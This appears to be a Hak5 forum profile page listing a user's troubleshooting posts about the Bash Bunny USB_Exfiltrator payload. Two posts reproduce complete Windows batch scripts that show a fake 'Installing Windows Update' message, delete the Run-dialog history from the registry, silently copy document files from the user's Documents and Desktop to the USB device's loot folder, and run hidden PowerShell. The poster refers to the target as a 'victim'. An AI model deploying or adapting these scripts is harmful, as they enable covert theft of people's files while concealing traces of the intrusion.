Jump to content
Hak5 Forums

digitalchameleon

Active Members
  • Content Count

    9
  • Joined

  • Last visited

About digitalchameleon

  • Rank
    Hackling

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. digitalchameleon

    Bash Bunny Usb Exfiltration Issue

    Still no luck
  2. digitalchameleon

    Bash Bunny Usb Exfiltration Issue

    Thanks I will give that a try
  3. Im fairly new to the Bash Bunny and am having some trouble getting the Usb Exfiltration Payload to work. These are the steps I have followed thus far. 1: Install firmware/Update firmware. 2: Download usb exfiltration payload and insert into switch 1 (I have tried payload in both switches). 3: Eject properly and test payload with bashbunny turned to appropriate switch position. After that the Bash Bunny creates a loot folder but with nothing inside. From other posts I have noticed the keyboard language might be an issue along with d.cmd file (cutting out the time stamp to solve it). Would anyone care to help shed some light on these issues for me? Greatly appreciated.
  4. digitalchameleon

    Bash Bunny Ducky Language

    Would someone care to explain how I change the language to gb? I performed ducky install, then used the updater to get all of the language files, I then went to my config.txt and set it to "#!/bin/bash #This configuration file is used to set default variables DUCKY_LANG gb". I am trying to run the usb exfiltration payload on switch 2 and it will not even show a loot folder now. From what I have found on this forum switching the keyboard language seems to be it.
  5. digitalchameleon

    [PAYLOAD] USB_Exfiltrator

    Hey ArmedWeasel, I took your advice and removed the time stamp and no change. I went back to Github to confirm I had all the updated payload scripts and confirmed that I do. So I went about looking threw your previous posts and noticed a script you left for people to try: @echo off @echo Installing Windows Update REM Delete registry keys storing Run dialog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Time and date stamps that are agnostic to user/system preference as it pulls them off the system and formats it the way you want it. for /f "delims=" %%a in ('wmic OS Get localdatetime ^| find "."') do set dt=%%a set datestamp=%dt:~0,8% set timestamp=%dt:~8,6% set YYYY=%dt:~0,4% set MM=%dt:~4,2% set DD=%dt:~6,2% set HH=%dt:~8,2% set Min=%dt:~10,2% set Sec=%dt:~12,2% set stamp=%YYYY%-%MM%-%DD% REM Creates directory comprised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%datestamp%_%timestamp% mkdir %dst% >>nul mkdir %dst%\Desktop mkdir %dst%\Documents if Exist %USERPROFILE%\Documents ( REM /C Continues copying even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted files to destination that does not support encryption. REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. REM /E Copies directories and subdirectories, including empty ones. REM 'For Loop' usage example. for %%e in (doc pdf wri txt ppt xls) do ( xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.%%e %dst%\Documents >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.%%e %dst%\Desktop >>nul ) REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.txt %dst% >>nul REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.xls %dst% >>nul REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.wri %dst% >>nul REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.doc %dst% >>nul REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.rtf %dst% >>nul REM Same as above but does not create empty directories REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul ) REM Blink CAPSLOCK key start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" @cls @exit Its a good script and I tried that out and got it to add more folders but the same issue with no files copied. Would it be okay if I compared the scripts that you use that work for you to mine scripts? Or would you like me to post what I am currently using? Thanks for your continued help.
  6. digitalchameleon

    [PAYLOAD] USB_Exfiltrator

    Thank you ArmedWeasel for your reply, sorry for my delayed response. Attached here is my e.cmd file that i wrote and saved in Notepad ++: @echo off @echo Installing Windows Update REM Delete registry keys storing Run dialog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% mkdir %dst% >>nul if Exist %USERPROFILE%\Documents ( REM /C Continues copying even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted files to destination that does not support encryption. REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. REM /E Copies directories and subdirectories, including empty ones. REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*%dst% >>nul REM Same as above but does not create empty directories xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\%dst% >>nul ) REM Blink CAPSLOCK key start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" @cls @exit As for my victims computer it is just a basic windows 10 operating desktop and the position i use to arm my payloads (and etc) is in 3, I put this particular payload in payload switch 1 and when I try to execute this payload I eject the bashbunny, flip it to switch 1 and insert. It will make a folder but the folder is empty. Will having my pc run linux make any difference? Thanks.
  7. digitalchameleon

    [PAYLOAD] USB_Exfiltrator

    Hey everyone, I know this is a noob question but I cant seem to get the bashbunny to use the USB-exfiltrator correctly. I have set up my BashBunny with the USB-Exfiltrator. I put the "d.cmd, e.cmd, i.vbs, payload.txt" files all into switch1 folder. I kept the original code (with .pdf and everything) and the closest I get to having files copied over into the BashBunny is having a folder added to the "loot folder" that says "USB-Exfiltrator" and inside is a smaller folder added but inside the folder is nothing. I purposely added 3 .pdf files to my computers documents folder just to see if it would grab any of them but no luck. I feel like its something simple that I am missing, Wondering if any of you guys can shed some light on my problem. Thanks.
×